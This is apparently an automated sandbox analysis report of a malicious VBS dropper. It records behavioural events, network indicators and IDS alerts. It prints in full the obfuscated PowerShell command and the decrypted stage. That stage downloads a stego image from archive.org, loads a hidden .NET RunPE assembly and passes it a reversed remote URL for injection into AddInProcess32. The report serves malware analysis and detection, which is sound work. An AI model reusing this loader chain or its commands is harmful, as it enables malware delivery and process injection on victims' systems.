Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 24, 2024, 9:08 a.m.	July 24, 2024, 9:10 a.m.

Size	55.4KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`3d6214efa393e9c67ecfbd8ca4bda0a7`
SHA256	`f884d494e7f128626fdd6e03440082058d3d65a039387ae84e83598cea1ba926`
CRC32	`F9101803`
ssdeep	`1536:QdU+NdJJigdJ4ZxedJasiNJjJcKwCbEt8oYYn9Zqbd6M0C+6kZp03mt2:3Zx/vcKwCbEt89aZqpX+7U3S2`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\mydatinglifeissoggod.vbs
1072
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87249095873756925133548634564426CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIZLpL9xl3Py+l8SR7slUHUevBi1kBPUVFUCXAdS1V5ry05GEIxWvXEOEv1VXBCN/6cFqtMoGP0r3wozPtH3gBxltdo0dRAPTvI+5L5jNRlmpL7WSN11Y+o37cmQECE8m5yoQaueGAvWVRkCK/PJggM1f7GsQuVUav7ecHNhuvfvbIUtomkHUSPUynPB7YxjwHb9VVASA6ynKfVj20Nfj8WQ7m2yfUEf4iX1Z2RtVRce/Tc/UOEG/UJWb/SMU7rylafB8vATtzQFPJtzBfjVsf3peHeI8xleZA8YPEScObOBTc+uNaMICEVs7R4BLmsc4l8PCLyph5Lgp++ElK7qI4jtp/RHIJuqorKpX6Z6enzP2OnM6Gdkj3oeTd6TDHXJRaUSOu4AP12kaFVPUHjF/0HzsFavMzg+Z0486QdMYNBAx5AM0K/ux8BInwP0WVlwkexz3i8PtSLHiOZjMZM0mfpBrZzyj7YNu+99FOBZSBWkgl7GF4VBexJkO7BuZQ/8KFjHyZNiHjGUzAMeLD2YOxqqb7qXZvV86/mnCaAdvTRkrdbsedMvxZLGwcdO/kFSezhOQHAxj0nTy50GK0fRfN+EouESXq0TyVPKn6RQ7NZA/tp6SscNfu0IZCTxk5yAfLRq0UUSRFHK7JDTbqfXFgnrlaDktcVcvJ7chZWsyZlaeTn8UD1NVuoPbwAo+cceAVYjSIEs/4nJQy4FeV3hup3tAK5+q1xAcHEfz5lyvj9gxOFUsAbIEtWoQq49ZMNoOe4mdm1N915TDKBfBvjhQWlKPOFU6VpIS1fjh9bD9luXJcqT3WMfXD2+rOvtqB77xcyJ5U4HPTw2wM5NXisVtECe42SWZhBCulh7qInAsksm8Uasns4sgc4u/dzWk9Pd72ZpmVeZlCQ5dmIrXeilYleXmsZPtjGXQdQXU1be07ioVuMLFRlQAYgvUZZAcqu1x2ndcER9XrnH5yo4xSvEfTYXNR7mJcPBdCf/a0OrfwlnDoNrIJVuNCW5tSSdt4dc6+HTvdpurrcwqDwVRoj1FvcEKPEZSpnqSICFzcP/VUBP5HPm+AxruprcAOd+XuLkUIu2P9E9RFLDfe/FyC6ZMBoNVfIUlre8xrGhKU8YplJh4xUKmzJWmGzQaX52PbhdD+oQK4QmH+gz31Xd26dXnY2i3pkowffE2WT0Hd1q8OtjkgmN3cEJtNHPOh+y74t++HAmn28qyqMsHrp3ZvFeLsn5CipIEWqbj085ABBwfkGiGHRoTArXWxB+KLgIqXhU9MJ5HCihOfq+K4TsBwkDBq0kGKVi7yYHM0H7cXTtl8xaeYdszb3+8UYMTd/VnYFBCIczEr8wLjI6lA+Wh4gMUfan/X7R0sMw8zDoJezuccj93Ja8+pzRDpUXE41+2rd+N+Js0A4OpwbrL2dMigMJlceKXw7S3skJXJNFR4GWUS8plXZkj+8KQAq6mLfuY81ETRclFSZ8AwZQXPZaQdPCL8cpqVBjdHDxaJGUO2W5/WV6XwBBZQBWYW14JnnGep6zNhQeAFLQFqG5brETFxYXmg7mMgkb9LdJXrFTc2W6wcp9XNvzBOgTYtHvCXLaKSJ4hp5EmpZvBWzE9CJvwVjkK4usRXyfei5Y3CB02D6OGurX9Un56ijcMiHjrmxs+O0kqc0JhxR8LJUXbao7SYEvms+CayWu2ST8GQ7smRUi0VR6bIx3AE3mSQ6HJQ5dNBANiQSmIg3deBJmWbspKm7azWwKCytzN//aoV7zQViOO/34qAvsHA7lEy/DLqHEd0w+bLgM0Lo5vCElEUh6CCXB3XJA==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
  2216

Name	Response	Post-Analysis Lookup
ia803405.us.archive.org	A 207.241.232.195	207.241.232.195
pastecode.dev	A 172.66.40.229 A 172.66.43.27	172.66.43.27

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.66.43.27	Active	Moloch
207.241.232.195	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49168 -> 207.241.232.195:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 207.241.232.195:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2053944	ET INFO Pastebin-like Service Domain in DNS Lookup (pastecode .dev)	Misc activity
TCP 192.168.56.103:49161 -> 172.66.43.27:443	2053997	ET INFO Observed Pastebin-like Service Domain (pastecode .dev) in TLS SNI	Misc activity
TCP 192.168.56.103:49161 -> 172.66.43.27:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 207.241.232.195:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 207.241.232.195:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49161 172.66.43.27:443	C=US, O=Google Trust Services, CN=WE1	CN=pastecode.dev	d9:2a:74:a8:39:b7:f5:58:35:8b:6b:79:ec:51:d6:73:e6:0f:03:b8

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 24, 2024, 9:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 24, 2024, 9:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 24, 2024, 9:08 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 24, 2024, 9:08 a.m.			0	0

Command line console output was observed (44 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: Method invocation failed because [System.Security.Cryptography.AesManaged] does console_handle: 0x00000023	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: n't contain a method named 'Dispose'. console_handle: 0x0000002f	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: At line:1 char:715 console_handle: 0x0000003b	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: + function Decrypt-AESEncryption {Param([String]$Base64Text,[String]$Key)$aesMa console_handle: 0x00000047	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: naged = New-Object System.Security.Cryptography.AesManaged;$aesManaged.Mode = [ console_handle: 0x00000053	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: System.Security.Cryptography.CipherMode]::CBC;$aesManaged.Padding = [System.Sec console_handle: 0x0000005f	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: urity.Cryptography.PaddingMode]::Zeros;$aesManaged.BlockSize = 128;$aesManaged. console_handle: 0x0000006b	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: KeySize = 256;$aesManaged.Key = (New-Object System.Security.Cryptography.SHA256 console_handle: 0x00000077	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key));$cipherBytes console_handle: 0x00000083	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: = [System.Convert]::FromBase64String($Base64Text);$aesManaged.IV = $cipherBytes console_handle: 0x0000008f	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: [0..15];$decryptor = $aesManaged.CreateDecryptor();$decryptedBytes = $decryptor console_handle: 0x0000009b	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: .TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16);$aesManaged.Di console_handle: 0x000000a7	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: spose <<<< ();return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Tr console_handle: 0x000000b3	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: im([char]0);}$chave = "87249095873756925133548634564426";$textoCriptografadoBas console_handle: 0x000000bf	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: e64 = "ZLpL9xl3Py+l8SR7slUHUevBi1kBPUVFUCXAdS1V5ry05GEIxWvXEOEv1VXBCN/6cFqtMoGP console_handle: 0x000000cb	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: 0r3wozPtH3gBxltdo0dRAPTvI+5L5jNRlmpL7WSN11Y+o37cmQECE8m5yoQaueGAvWVRkCK/PJggM1f console_handle: 0x000000d7	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: 7GsQuVUav7ecHNhuvfvbIUtomkHUSPUynPB7YxjwHb9VVASA6ynKfVj20Nfj8WQ7m2yfUEf4iX1Z2Rt console_handle: 0x000000e3	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: VRce/Tc/UOEG/UJWb/SMU7rylafB8vATtzQFPJtzBfjVsf3peHeI8xleZA8YPEScObOBTc+uNaMICEV console_handle: 0x000000ef	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: s7R4BLmsc4l8PCLyph5Lgp++ElK7qI4jtp/RHIJuqorKpX6Z6enzP2OnM6Gdkj3oeTd6TDHXJRaUSOu console_handle: 0x000000fb	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: 4AP12kaFVPUHjF/0HzsFavMzg+Z0486QdMYNBAx5AM0K/ux8BInwP0WVlwkexz3i8PtSLHiOZjMZM0m console_handle: 0x00000107	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: fpBrZzyj7YNu+99FOBZSBWkgl7GF4VBexJkO7BuZQ/8KFjHyZNiHjGUzAMeLD2YOxqqb7qXZvV86/mn console_handle: 0x00000113	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: CaAdvTRkrdbsedMvxZLGwcdO/kFSezhOQHAxj0nTy50GK0fRfN+EouESXq0TyVPKn6RQ7NZA/tp6Ssc console_handle: 0x0000011f	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: Nfu0IZCTxk5yAfLRq0UUSRFHK7JDTbqfXFgnrlaDktcVcvJ7chZWsyZlaeTn8UD1NVuoPbwAo+cceAV console_handle: 0x0000012b	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: YjSIEs/4nJQy4FeV3hup3tAK5+q1xAcHEfz5lyvj9gxOFUsAbIEtWoQq49ZMNoOe4mdm1N915TDKBfB console_handle: 0x00000137	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: vjhQWlKPOFU6VpIS1fjh9bD9luXJcqT3WMfXD2+rOvtqB77xcyJ5U4HPTw2wM5NXisVtECe42SWZhBC console_handle: 0x00000143	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: ulh7qInAsksm8Uasns4sgc4u/dzWk9Pd72ZpmVeZlCQ5dmIrXeilYleXmsZPtjGXQdQXU1be07ioVuM console_handle: 0x0000014f	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: LFRlQAYgvUZZAcqu1x2ndcER9XrnH5yo4xSvEfTYXNR7mJcPBdCf/a0OrfwlnDoNrIJVuNCW5tSSdt4 console_handle: 0x0000015b	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: dc6+HTvdpurrcwqDwVRoj1FvcEKPEZSpnqSICFzcP/VUBP5HPm+AxruprcAOd+XuLkUIu2P9E9RFLDf console_handle: 0x00000167	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: e/FyC6ZMBoNVfIUlre8xrGhKU8YplJh4xUKmzJWmGzQaX52PbhdD+oQK4QmH+gz31Xd26dXnY2i3pko console_handle: 0x00000173	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: wffE2WT0Hd1q8OtjkgmN3cEJtNHPOh+y74t++HAmn28qyqMsHrp3ZvFeLsn5CipIEWqbj085ABBwfkG console_handle: 0x0000017f	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: iGHRoTArXWxB+KLgIqXhU9MJ5HCihOfq+K4TsBwkDBq0kGKVi7yYHM0H7cXTtl8xaeYdszb3+8UYMTd console_handle: 0x0000018b	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: /VnYFBCIczEr8wLjI6lA+Wh4gMUfan/X7R0sMw8zDoJezuccj93Ja8+pzRDpUXE41+2rd+N+Js0A4Op console_handle: 0x00000197	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: wbrL2dMigMJlceKXw7S3skJXJNFR4GWUS8plXZkj+8KQAq6mLfuY81ETRclFSZ8AwZQXPZaQdPCL8cp console_handle: 0x000001a3	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: qVBjdHDxaJGUO2W5/WV6XwBBZQBWYW14JnnGep6zNhQeAFLQFqG5brETFxYXmg7mMgkb9LdJXrFTc2W console_handle: 0x000001af	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: 6wcp9XNvzBOgTYtHvCXLaKSJ4hp5EmpZvBWzE9CJvwVjkK4usRXyfei5Y3CB02D6OGurX9Un56ijcMi console_handle: 0x000001bb	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: Hjrmxs+O0kqc0JhxR8LJUXbao7SYEvms+CayWu2ST8GQ7smRUi0VR6bIx3AE3mSQ6HJQ5dNBANiQSmI console_handle: 0x000001c7	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: g3deBJmWbspKm7azWwKCytzN//aoV7zQViOO/34qAvsHA7lEy/DLqHEd0w+bLgM0Lo5vCElEUh6CCXB console_handle: 0x000001d3	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: 3XJA==";$textoDescriptografado = Decrypt-AESEncryption -Base64Text $textoCripto console_handle: 0x000001df	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: grafadoBase64 -Key $chave;Write-Host "Texto Descriptografado: $textoDescriptogr console_handle: 0x000001eb	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: afado";Invoke-Expression $textoDescriptografado; console_handle: 0x000001f7	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: + CategoryInfo : InvalidOperation: (Dispose:String) [], RuntimeEx console_handle: 0x00000203	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: ception console_handle: 0x0000020f	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x0000021b	1	1
WriteConsoleW July 24, 2024, 9:08 a.m.	buffer: Texto Descriptografado: function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg', 'https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.dpdpdpdr46esabym/441.922.571.701//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} } console_handle: 0x00000237	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00410f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004115f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004117f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00411330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ae968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 24, 2024, 9:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ae968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 24, 2024, 9:08 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET https://pastecode.dev/raw/6l7qjjrz/paste1.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 163 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02480000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02540000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
